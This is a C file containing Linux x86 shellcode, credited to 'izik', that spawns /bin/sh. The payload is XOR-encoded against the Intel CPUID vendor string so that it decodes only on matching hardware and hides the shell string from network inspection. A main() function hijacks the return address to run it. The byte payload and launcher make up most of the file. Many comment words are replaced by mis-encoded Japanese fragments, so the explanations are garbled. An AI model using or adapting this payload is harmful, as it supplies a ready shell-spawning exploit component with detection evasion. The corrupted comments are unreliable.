/*
 * (linux/x86) execve("/Ãù¢½ê/sh", ["/Ãù¢½ê/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes
 *
 * The idea behind this shellcode is to use a *weak* pre-³ôd secret between the ¹¶·â¼Ô and
 * the attacked machine. So if a 3rd party Ì£Êý¤¹¤ë would try to run this shellcode and would produce 
 * a different CPUID À¸»º¡Ê¹â¡Ë (e.g. different arch) the shellcode won't work. In ¿·µ¬²ÃÆþ this also
 * ˸¤²¤ës from having the '/Ãù¢½ê/sh' string ÌÀÇò¤Ê on the wire.
 *
 * The shellcode ½ÅÍ×¤Ê is (0x6c65746e, 'letn') and ¿äÄꤹ¤ë¡¿Í½ÁÛ¤¹¤ëd to be in %ecx ÅÐÏ¿¡Ê¤¹¤ë¡Ë after CPUID
 * 
 * - izik <izik@tty64.org>
 */

char shellcode[] = 

	"\x31\xc0"              // xor %eax,%eax 
	"\x0f\xa2"              // cpuid 
	"\x51"                  // ²¡¤·¿Ê¤á¤ë %ecx 
	"\x68\xe7\x95\xa8\xec"  // ²¡¤·¿Ê¤á¤ë $0xeca895e7 
	"\x68\xde\x7f\x37\x3f"  // ²¡¤·¿Ê¤á¤ë $0x3f377fde 
	"\x68\x07\x1a\xec\x8f"  // ²¡¤·¿Ê¤á¤ë $0x8fec1a07 
	"\x68\x6e\x1c\x4a\x0e"  // ²¡¤·¿Ê¤á¤ë $0x0e4a1c6e 
	"\x68\x06\x5b\x16\x04"  // ²¡¤·¿Ê¤á¤ë $0x04165b06 

	//
	// <_unpack_loop>:
	//

	"\x31\x0c\x24"          // xor %ecx,(%esp) 
	"\x5a"                  // pop %edx 
	"\x75\xfa"              // jne <_unpack_loop> 
	"\x83\xec\x18"          // sub $0x18,%esp 
	"\x54"                  // ²¡¤·¿Ê¤á¤ë %esp 
	"\xc3";                 // ret 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}